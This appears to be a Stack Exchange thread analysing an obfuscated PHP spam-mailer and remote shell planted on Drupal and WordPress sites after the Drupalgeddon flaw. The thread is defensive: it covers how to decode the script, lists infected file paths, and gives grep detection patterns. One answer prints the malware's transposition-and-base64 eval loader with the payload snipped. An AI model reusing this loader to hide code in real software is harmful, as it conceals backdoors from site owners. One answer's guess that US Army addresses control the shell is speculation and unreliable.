Comment: No prob, just finished an edit that includes a note about the Russian in the code.

Comment: Found this [online PHP & HHVM shell site](http://3v4l.org/ArWaW) which seems to decode the output automatically and it's doing some code analysis also.

Comment: Funny, doing a GeoIP lookup, this seems to target USAISC headquarters as well as Level 3 servers. Running something on your server that targets US Army is probably not such a great plan.

Comment: Nice work! Just a hint to make decoding faster/easier: you can simply replace the `eval` by an `echo`, and execute the script manually `php that_file.php > decoded.php`.

Answer (score 4):

#### About the script

The code is obvious malicious script written in PHP for sending spams and other illegal activities.

This script actually is very easy to decode by changing `eval` to `echo` and executing it will print the well formatted source code.

The reason why the authors of that exploit spent so much time on securing this code via transposition array mapping (despite easy method of decoding it) is that its  code can be changeable ([metamorphic code](https://en.wikipedia.org/wiki/Computer_virus#Metamorphic_code)) and unique for each server infection which prevents being easily detected by standard methods of detection (anti-virus , `grep`, Google, etc.).

#### Method of action

One user reported, this script was sending out spam massively and clogging up Qmail on the server, preventing sending and receiving legitimate emails from other sites on the server(nearly 10,000 emails in the queue)<sup>[source](http://www.drupal.org.uk/forum/drupalgeddon-crisis-us-all)</sup>.

And the most offending IP addresses were:

```
62.76.191.119
146.185.239.51 (Russia)
37.203.208.9
```

The example spam e-mail looks like:

```
To: <x@example.com>
Subject: 55th Anniversary and Free Pizza
X-PHP-Originating-Script: 763659:template46.php(236) : eval()'d code
From: Pizza Hut <support@example.com>
X-Mailer: mPOPWeb-Mail2.19
Reply-To: Pizza Hut <support@example.com>
Content-Type: multipart/alternative;
boundary="----------1414414378544E402ACEEBC"
Message-ID: <E1Xijn8-00071P-Rb@web127.extendcp.co.uk>
Date: Mon, 27 Oct 2014 12:52:58 +0000

Free personal Pan Pizza
Today we are celebrating our 55th anniversary and we want you to share this celebration with us - you may get a free pizza in any of our restaurants.
Get Free Pizza Coupon
The offer is valid through November 5th, 2014.
Copyright (c) 2014 | All right reserved | Pizza Hut
```

The method of its action is also explained by [tremor on stackoverflow](https://stackoverflow.com/questions/26931471/php-need-help-to-understand-injected-code).

#### Identifying and finding

It seems there are many variations of it (as [here](https://gist.github.com/Strae/38e36d0a54f60843dc66), [here](http://devfarm.it/wordpress/wordpress-massmailer-malware-and-wso-2-5-1-shell-backdoor/)) and while investigating on the internet the most frequent reports, the most common victims are Drupal CMS and Wordpress instances.

Here are the variation of these scripts on Drupal:

```
sites/all/modules/contrib/ctools/stylizer/plugins/export_ui/template46.php
sites/all/libraries/ckeditor/plugins/specialchar/dialogs/.files74.php
modules/image/tests/stats.php
sites/all/libraries/ckeditor/skins/office2003/images/ajax48.php
sites/all/themes/austin/templates/.javascript.php
sites/all/libraries/ckeditor/plugins/scayt/dialogs/list.php
sites/all/libraries/ckeditor/plugins/scayt/dialogs/.login25.php
sites/default/files/styles/gallerformatter_thumb/public/.sql74.php
sites/all/modules/colorbox/styles/stockholmsyndrome/images/.cache61.php
modules/field/modules/text/.file.php
css/object16.php
sites/all/modules/i18n/i18n_block/stats7.php
```

and [Wordpress](http://devfarm.it/wordpress/wordpress-massmailer-malware-and-wso-2-5-1-shell-backdoor/):

```
wp-content/backup-2365b/.title14.php
wp-content/uploads/wysija/themes/rss.lib.php
wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php
```

Looking on the pattern of these files, seems they've been uploaded automatically by another script and its filename is based on the most common IT phrases followed by the random number, `php` extension and optional dot (which hides the file).

How to find these files?

I've used grep as below:

```
grep -R return.*base64_decode  .
```

or:

```
grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' .
```

If there is no access to shell, transferring over FTP (`ncftpget -R`) and checking locally would help.

#### What's affected and how it get there

The Drupal is the most affected, because of the recent SQL injection vulnerability ([SA-CORE-2014-005](https://www.drupal.org/SA-CORE-2014-005)) which allows an attacker to send specially crafted requests resulting in arbitrary SQL execution which would create a new file within the Drupal folder hierarchy that would later be used to try to hack the system. This was rated as 25 of 25 as Highly Critical bug and all Drupal core 7.x versions prior to 7.32 were affected. That's why it was called Drupageddon. Read more at: [FAQ on SA-CORE-2014-005](https://www.drupal.org/drupalsa05FAQ)

[Wikipedia](https://en.wikipedia.org/wiki/Drupal#cite_ref-sql-injection-vulnerability_57-0) states:

> On October 15, 2014, a sql injection vulnerability was announced and update released. Two weeks later the Drupal security team released an advisory explaining that everyone should act under the assumption that any site not updated within 7 hours of the announcement are infected. Thus, it can be extremely important to apply these updates quickly and usage of a tool to make this process easier like drush is highly recommended.

#### Read more

- [Drupalgeddon a crisis for us all](http://www.drupal.org.uk/forum/drupalgeddon-crisis-us-all)
- [FAQ on SA-CORE-2014-005](https://www.drupal.org/drupalsa05FAQ)
- [A collection of PHP exploit scripts, found when investigating hacked servers.](https://github.com/kenorb/php-exploit-scripts)
- [Spam scripts sample](http://fstrange.ru/coder/php/virus-opencart.html)
- [Learning from hackers a week after the Drupal SQL Injection announcement](https://www.acquia.com/blog/learning-hackers-week-after-drupal-sql-injection-announcement)
- [SA-CORE-2014-005 - Drupal core - SQL injection](https://github.com/kenorb/drupageddon) at GitHub

Answer (score 1):

That's a remote command shell for a server that's probably been hacked, and you should consider the server compromised. You would be wise to suspend everything it hosts, audit all code on the machine and rebuild it / replace it.

Remote users who probably control this script can force it to issue any command by posting "CODE" that's base64_encoded (that sent "code" gets eval'd).

The script is locked down to an IP address range. The control IP addresses seem to be `6.185.239.*` and `8.138.118.*` ... which are bizarrely owned by the U.S. Department of Defense (United States Army Information Systems Command) and Level3, a backbone provider (I only checked a handful of IP addresses on those two ranges, but so far it's pretty damning.) This is the logic that checks it is `is_good_ip()`.

So either:

1. this is something sent and controlled by the Army out of Fort Huachuca, AZ
2. their servers are compromised and are being used to wash this chain of command
3. neither: someone's falsely implicating or accusing the DOD by listing their IP addresses in a shell and are instead using the Level3 machines to communicate.

Anyhow, in your original long snippet, if you override that last bit `eval(...)` and replace it with echo `htmlentities(...)`, you can see the full code listing. Lot of it seems to be centering on emails and probably spidering content for generating email content.

Source: Posted by pp19dd at [Can anyone decode this?](http://www.reddit.com/r/PHPhelp/comments/2rvu8b/can_anyone_decode_this/)

Comment: 4. The government took over the IP addresses because of illegal activity?

Comment: @JoshuaDwire Damn, never knew they could do that.

Answer (score 0):

This file employs similar tactics to obfuscate the payload. The variable names and indentation changed, and its actions become very clear:

```
<?php
$char_transposition_map = Array('1'=>'N', '0'=>'S', '3'=>'O', '2'=>'8', '5'=>'v', '4'=>'3', '7'=>'H', '6'=>'n', '9'=>'W', '8'=>'u', 'A'=>'C', 'C'=>'f', 'B'=>'9', 'E'=>'q', 'D'=>'g', 'G'=>'y', 'F'=>'Y', 'I'=>'0', 'H'=>'t', 'K'=>'F', 'J'=>'w', 'M'=>'Q', 'L'=>'b', 'O'=>'2', 'N'=>'d', 'Q'=>'k', 'P'=>'6', 'S'=>'T', 'R'=>'V', 'U'=>'p', 'T'=>'R', 'W'=>'x', 'V'=>'4', 'Y'=>'s', 'X'=>'5', 'Z'=>'X', 'a'=>'A', 'c'=>'G', 'b'=>'e', 'e'=>'j', 'd'=>'1', 'g'=>'L', 'f'=>'U', 'i'=>'B', 'h'=>'r', 'k'=>'c', 'j'=>'a', 'm'=>'P', 'l'=>'7', 'o'=>'h', 'n'=>'D', 'q'=>'m', 'p'=>'I', 's'=>'o', 'r'=>'Z', 'u'=>'i', 't'=>'M', 'w'=>'J', 'v'=>'l', 'y'=>'E', 'x'=>'z', 'z'=>'K');

function transpose_and_base64_decode($source_text, $transposition_map) {
  $transposed_string = '';
  for($i=0; $i < strlen($source_text); $i++) {
    $transposed_string .= isset($transposition_map[$source_text[$i]]) ? $transposition_map[$source_text[$i]] : $source_text[$i];
  }
  return base64_decode($transposed_string);
}

$long_text = '<SNIP>';

eval(transpose_and_base64_decode($long_text, $char_transposition_map));
?>
```

Source: [Deobfuscating PHP Malware](http://mattgreensmith.net/2015/01/11/deobfuscating-php-malware/)